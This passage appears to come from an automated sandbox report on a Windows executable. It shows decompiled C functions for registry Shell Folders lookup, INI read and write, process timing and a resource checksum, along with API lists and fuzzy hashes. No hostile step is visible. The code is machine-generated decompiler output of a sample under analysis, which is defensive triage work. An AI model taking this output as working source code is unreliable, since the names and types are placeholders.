                                                                                                                                                                    				_v576 = E00406264(0x412320, _t134,  *((intOrPtr*)(_t151 + 0x18)));
                                                                                                                                                                    				return E00408603( &(_v600[0xffffffffffffff2d]),  &_v596, _t134);
                                                                                                                                                                    			}












































                                                                                                                                                                    0x004020cd
                                                                                                                                                                    0x004020d2
                                                                                                                                                                    0x004020d6
                                                                                                                                                                    0x004020da
                                                                                                                                                                    0x004020de
                                                                                                                                                                    0x00402097
                                                                                                                                                                    0x004020ff
                                                                                                                                                                    0x0040210a
                                                                                                                                                                    0x00402126

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$wcscmp
                                                                                                                                                                    • String ID: #A$ #A$ #A$@#A$@#A
                                                                                                                                                                    • API String ID: 243296809-3329557610
                                                                                                                                                                    • Opcode ID: 551c5d0b41552bd75e6a54948491ad4efb7b493be535b428f589f19a70e77ed3
                                                                                                                                                                    • Instruction ID: dbc7ccb7a4322fbd292e3ccaf68edd9f7786ca1a27a33b966897527a52c99039
                                                                                                                                                                    • Opcode Fuzzy Hash: 551c5d0b41552bd75e6a54948491ad4efb7b493be535b428f589f19a70e77ed3
                                                                                                                                                                    • Instruction Fuzzy Hash: D2612D715083419FC310EF6AC981A1BB7E4AF88324F108A3EF5A9E72E1D779D4158B5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                    			E0040DACC(wchar_t* __ebx, void* __ecx) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				char _v72;
                                                                                                                                                                    				void _v590;
                                                                                                                                                                    				long _v592;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                    
                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                    				_t26 = __ebx;
                                                                                                                                                                    				E0040DA9D();
                                                                                                                                                                    				_t38 =  *0x413264; // 0x76033bb0
                                                                                                                                                                    				if(_t38 == 0) {
                                                                                                                                                                    					_v592 = 0;
                                                                                                                                                                    					memset( &_v590, 0, 0x206);
                                                                                                                                                                    					_t3 =  &_v8; // 0x403a63
                                                                                                                                                                    					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, _t3) == 0) {
                                                                                                                                                                    						_t5 =  &_v8; // 0x403a63
                                                                                                                                                                    						E0040D6BF(0x104, _t27,  &_v592,  *_t5,  &_v72);
                                                                                                                                                                    						RegCloseKey(_v8);
                                                                                                                                                                    					}
                                                                                                                                                                    					wcscpy(_t26,  &_v592);
                                                                                                                                                                    					return 0 |  *_t26 != 0x00000000;
                                                                                                                                                                    				}
                                                                                                                                                                    				E004058FB();
                                                                                                                                                                    				_t25 =  *0x413264(0, __ebx, 0x1c, 0); // executed
                                                                                                                                                                    				return _t25;
                                                                                                                                                                    			}












                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040DA9D: LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                                      • Part of subcall function 0040DA9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                                    • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,c:@,?,?,?), ref: 0040DB27
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040DB4E
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DB5D
                                                                                                                                                                      • Part of subcall function 004058FB: GetVersionExW.KERNEL32(00412B18,?,0040DAEA,?), ref: 00405915
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCloseFolderLibraryLoadOpenPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$c:@
                                                                                                                                                                    • API String ID: 2249099915-3068728944
                                                                                                                                                                    • Opcode ID: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                                    • Instruction ID: c666c52b0d5343781dad8f8333b9175691e3d2dec84d7c30fbf64d54c1d05659
                                                                                                                                                                    • Opcode Fuzzy Hash: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                                    • Instruction Fuzzy Hash: FE01D671905214AED720BB95AD4AEEF777CDF84304F2000BAF909B10D2EA745E88DA69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                    			E0040BB15(void* __eflags) {
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                    				struct HICON__* _t42;
                                                                                                                                                                    				void* _t48;
                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                    				intOrPtr* _t59;
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    
                                                                                                                                                                    				_t59 =  *((intOrPtr*)(_t60 + 0xc));
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x208)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x244)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x274)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x240)) = 0;
                                                                                                                                                                    				 *_t59 = 0x410438;
                                                                                                                                                                    				_t35 = _t59 + 0x6ac;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x694)) = 0;
                                                                                                                                                                    				_t50 = _t59 + 0x6c4;
                                                                                                                                                                    				 *((intOrPtr*)(_t35 + 0xc)) = 0;
                                                                                                                                                                    				 *_t35 = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t35 + 4)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t35 + 0x10)) = 0x100;
                                                                                                                                                                    				 *((intOrPtr*)(_t35 + 8)) = 0;
                                                                                                                                                                    				E0040133A(_t50);
                                                                                                                                                                    				 *_t50 = 0x40f7b8;
                                                                                                                                                                    				_t37 = E0040167A(_t50 + 0x40);
                                                                                                                                                                    				 *((short*)(_t50 + 0x80)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t50 + 0x2080)) = 1;
                                                                                                                                                                    				 *((intOrPtr*)(_t50 + 0x2084)) = 1;
                                                                                                                                                                    				 *((intOrPtr*)(_t50 + 0x2088)) = 1;
                                                                                                                                                                    				_push(0x2238);
                                                                                                                                                                    				 *((intOrPtr*)(_t50 + 4)) = 0x72;
                                                                                                                                                                    				 *((intOrPtr*)(_t50 + 0x74)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t50 + 0x78)) = 0;
                                                                                                                                                                    				L0040E038(); // executed
                                                                                                                                                                    				if(_t37 == 0) {
                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *((intOrPtr*)(_t37 + 0x14)) = 1;
                                                                                                                                                                    					 *((short*)(_t37 + 0x18)) = 0;
                                                                                                                                                                    					 *((short*)(_t37 + 0x228)) = 0;
                                                                                                                                                                    					 *((intOrPtr*)(_t37 + 0x2228)) = 1;
                                                                                                                                                                    					 *((intOrPtr*)(_t37 + 0x222c)) = 1;
                                                                                                                                                                    					 *((intOrPtr*)(_t37 + 0x2230)) = 1;
                                                                                                                                                                    					 *0x412b14 = _t37;
                                                                                                                                                                    				}
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x698)) = _t37;
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				_t63 = _t37;
                                                                                                                                                                    				_t48 = 0xc00;
                                                                                                                                                                    				if(_t37 == 0) {
                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t38 = E0040219B(_t37, _t63);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t57 = _t59 + 0x27c;
                                                                                                                                                                    				 *_t57 = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x69c)) = _t38;
                                                                                                                                                                    				E00401000(_t59 + 0x492, _t48, 0x412054);
                                                                                                                                                                    				 *_t57 = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x284)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x280)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x278)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t59 + 0x6a0)) = 0;
                                                                                                                                                                    				_t42 = LoadIconW(GetModuleHandleW(0), 0x65); // executed
                                                                                                                                                                    				E00401879(_t59, _t42);
                                                                                                                                                                    				return _t59;
                                                                                                                                                                    			}
















                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040133A: memset.MSVCRT ref: 0040134C
                                                                                                                                                                      • Part of subcall function 0040167A: memset.MSVCRT ref: 00401690
                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040BBA5
                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040BBE3
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00002238), ref: 0040BC31
                                                                                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0040BC3A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@memset$HandleIconLoadModule
                                                                                                                                                                    • String ID: T A
                                                                                                                                                                    • API String ID: 2596266805-11209434
                                                                                                                                                                    • Opcode ID: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
                                                                                                                                                                    • Instruction ID: b1f1b1f427025bd6f8a5dd4ebf1048772c532f9d5de5c5214c9bf7dacc49333d
                                                                                                                                                                    • Opcode Fuzzy Hash: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
                                                                                                                                                                    • Instruction Fuzzy Hash: 1F31ACB19013559FC720DF6989886CABBE8FF08300F11867FE84CDB261D7B89654CB98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 20%
                                                                                                                                                                    			E0040D56B(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                                                                                    				signed short _v131076;
                                                                                                                                                                    				long _t17;
                                                                                                                                                                    
                                                                                                                                                                    				_t25 = __esi;
                                                                                                                                                                    				E0040E340(0x20000, __ecx);
                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                    					_t17 = GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24); // executed
                                                                                                                                                                    					return _t17;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                                                                                    						_push(_a24);
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v131076 = _v131076 & 0x00000000;
                                                                                                                                                                    						_push(__esi);
                                                                                                                                                                    						_push(L"\"%s\"");
                                                                                                                                                                    						_push(0xfffe);
                                                                                                                                                                    						_push( &_v131076);
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						_push(_a24);
                                                                                                                                                                    						_push( &_v131076);
                                                                                                                                                                    					}
                                                                                                                                                                    					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                                                                                    				}
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • wcschr.MSVCRT ref: 0040D585
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040D5AA
                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D5C8
                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 0040D5E0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                    • Opcode ID: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
                                                                                                                                                                    • Instruction ID: 59b69a585cfc8d845437793ab3ce32260e68e2dddd06eaeef13322f749f2ab00
                                                                                                                                                                    • Opcode Fuzzy Hash: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 3101783290421ABBEF219F919C06FDA3B6AAF04318F048035BE05601A2D7798525DBA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040CE3D(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                                                                                    				int _t8;
                                                                                                                                                                    				struct HINSTANCE__* _t9;
                                                                                                                                                                    
                                                                                                                                                                    				if( *0x4136f4 == 0) {
                                                                                                                                                                    					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                    					if(_t9 != 0) {
                                                                                                                                                                    						 *0x4136f4 = 1;
                                                                                                                                                                    						 *0x4136f8 = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *0x4136f8 == 0) {
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                                                                    					return _t8;
                                                                                                                                                                    				}
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE4E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0040CE68
                                                                                                                                                                    • GetProcessTimes.KERNELBASE(?,?,?,?,?,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE8B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                                    • Opcode ID: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
                                                                                                                                                                    • Instruction ID: 9062282254ac126051856908680c029023e6c569a8a6eaee544e1b96dd2f004d
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
                                                                                                                                                                    • Instruction Fuzzy Hash: E7F03031141209FFDF218FA0ED45F963BA8AB14301F008176F92CA1AB0D77585A4DB9C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                    			E0040768E(void* __esi) {
                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                    				intOrPtr _t10;
                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                    				intOrPtr* _t18;
                                                                                                                                                                    				void* _t19;
                                                                                                                                                                    
                                                                                                                                                                    				_t19 = __esi;
                                                                                                                                                                    				_t9 =  *((intOrPtr*)(__esi + 0x38));
                                                                                                                                                                    				if(_t9 != 0) {
                                                                                                                                                                    					_push(_t9);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t10 =  *((intOrPtr*)(_t19 + 0x48));
                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                    					_push(_t10);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t11 =  *((intOrPtr*)(_t19 + 0x2e4));
                                                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                                                    					_push(_t11);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t18 =  *((intOrPtr*)(_t19 + 0x2cc));
                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                    					_t11 =  *_t18;
                                                                                                                                                                    					if(_t11 != 0) {
                                                                                                                                                                    						_push(_t11); // executed
                                                                                                                                                                    						L0040E032(); // executed
                                                                                                                                                                    						 *_t18 = 0;
                                                                                                                                                                    					}
                                                                                                                                                                    					_push(_t18); // executed
                                                                                                                                                                    					L0040E032(); // executed
                                                                                                                                                                    				}
                                                                                                                                                                    				 *((intOrPtr*)(_t19 + 0x2cc)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t19 + 0x38)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t19 + 0x48)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t19 + 0x2e4)) = 0;
                                                                                                                                                                    				return _t11;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                    • Opcode ID: ecba441bf80caf65155bf32042a5b6e7135137503112716ea17be55409703e0f
                                                                                                                                                                    • Instruction ID: 342c1f177218003cdd1623b0f4e7fc54ae999312f226978e8e9af0a1ecb46938
                                                                                                                                                                    • Opcode Fuzzy Hash: ecba441bf80caf65155bf32042a5b6e7135137503112716ea17be55409703e0f
                                                                                                                                                                    • Instruction Fuzzy Hash: F1F03C72949A515BC724AE6ED8C485BB3E9AB043647604C3FF14AE3690CA39BC904A1C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                    			E00401DCF(void* __ecx, signed int _a4, signed short* _a8) {
                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                    				signed short* _t24;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    				signed short* _t32;
                                                                                                                                                                    
                                                                                                                                                                    				_t23 = _a4;
                                                                                                                                                                    				_t32 = _a8;
                                                                                                                                                                    				 *_t32 =  *_t32 & 0x00000000;
                                                                                                                                                                    				_t27 = 0xa;
                                                                                                                                                                    				if(_t23 > _t27) {
                                                                                                                                                                    					L12:
                                                                                                                                                                    					_t24 = _t32;
                                                                                                                                                                    					L13:
                                                                                                                                                                    					return _t24;
                                                                                                                                                                    				}
                                                                                                                                                                    				switch( *((intOrPtr*)(_t23 * 4 +  &M00401E73))) {
                                                                                                                                                                    					case 0:
                                                                                                                                                                    						__eax = __ecx + 0x38;
                                                                                                                                                                    						goto L15;
                                                                                                                                                                    					case 1:
                                                                                                                                                                    						__eax = __ecx + 0x30;
                                                                                                                                                                    						L15:
                                                                                                                                                                    						__eax = E00401D90(__eax, __esi); // executed
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					case 2:
                                                                                                                                                                    						__ecx =  *((intOrPtr*)(__ecx + 0x10));
                                                                                                                                                                    						goto L18;
                                                                                                                                                                    					case 3:
                                                                                                                                                                    						__ecx =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                                                                    						goto L18;
                                                                                                                                                                    					case 4:
                                                                                                                                                                    						__ecx =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                                                                    						goto L18;
                                                                                                                                                                    					case 5:
                                                                                                                                                                    						__ecx =  *((intOrPtr*)(__ecx + 0x1c));
                                                                                                                                                                    						L18:
                                                                                                                                                                    						__eax = 0x412320;
                                                                                                                                                                    						goto L3;
                                                                                                                                                                    					case 6:
                                                                                                                                                                    						__eflags =  *(__ecx + 0x40) & 0x00000001;
                                                                                                                                                                    						goto L6;
                                                                                                                                                                    					case 7:
                                                                                                                                                                    						__eflags =  *(__ecx + 0x40) & 0x00002000;
                                                                                                                                                                    						goto L6;
                                                                                                                                                                    					case 8:
                                                                                                                                                                    						__eflags =  *(__ecx + 0x40) & 0x00004000;
                                                                                                                                                                    						L6:
                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                    							_push(9);
                                                                                                                                                                    							_pop(__ebx);
                                                                                                                                                                    						}
                                                                                                                                                                    						__eax = E00406827(__ebx);
                                                                                                                                                                    						goto L13;
                                                                                                                                                                    					case 9:
                                                                                                                                                                    						_push( *((intOrPtr*)(__ecx + 0x2c)));
                                                                                                                                                                    						_push( *((intOrPtr*)(__ecx + 0x28)));
                                                                                                                                                                    						_push(L"%I64d");
                                                                                                                                                                    						_push(0xff);
                                                                                                                                                                    						_push(__esi);
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						__esp = __esp + 0x14;
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					case 0xa:
                                                                                                                                                                    						_t30 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                                    						L3:
                                                                                                                                                                    						_t24 = E00406306(0x412340, _t30);
                                                                                                                                                                    						if(_t24 == 0) {
                                                                                                                                                                    							_t24 = 0x40f454;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L13;
                                                                                                                                                                    				}
                                                                                                                                                                    			}








                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                    • String ID: #A$%I64d$@#A
                                                                                                                                                                    • API String ID: 3988819677-2754857024
                                                                                                                                                                    • Opcode ID: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
                                                                                                                                                                    • Instruction ID: 57e1b299ab2ee78cab24039c69e456b61a4fcaae797c094412e686c8a915beca
                                                                                                                                                                    • Opcode Fuzzy Hash: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
                                                                                                                                                                    • Instruction Fuzzy Hash: A811BF31204204D7D724AA54D841AA97369BB01358B3004BFFE16AE2E2D77AD953D3CE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040D9FC(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                                                                    				struct HRSRC__* _t12;
                                                                                                                                                                    				void* _t16;
                                                                                                                                                                    				void* _t17;
                                                                                                                                                                    				signed int _t18;
                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                    				struct HRSRC__* _t35;
                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                    
                                                                                                                                                                    				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                                                                                    				_t35 = _t12;
                                                                                                                                                                    				if(_t35 != 0) {
                                                                                                                                                                    					_t33 = SizeofResource(_a4, _t35);
                                                                                                                                                                    					if(_t33 > 0) {
                                                                                                                                                                    						_t16 = LoadResource(_a4, _t35);
                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                    							_t17 = LockResource(_t16);
                                                                                                                                                                    							if(_t17 != 0) {
                                                                                                                                                                    								_a4 = _t33;
                                                                                                                                                                    								_t29 = _t33 * _t33;
                                                                                                                                                                    								_t36 = 0;
                                                                                                                                                                    								_t7 =  &_a4;
                                                                                                                                                                    								 *_t7 = _a4 >> 2;
                                                                                                                                                                    								if( *_t7 != 0) {
                                                                                                                                                                    									do {
                                                                                                                                                                    										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                                                                                    										_t36 = _t36 + 1;
                                                                                                                                                                    										_t29 = _t26;
                                                                                                                                                                    									} while (_t36 < _a4);
                                                                                                                                                                    								}
                                                                                                                                                                    								_t18 =  *0x412b10; // 0x10350e5a
                                                                                                                                                                    								 *0x412b10 = _t18 + _t29 ^ _t33;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}












                                                                                                                                                                    APIs
                                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 0040DA09
                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040DA1A
                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0040DA2A
                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040DA35
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                    • String ID:
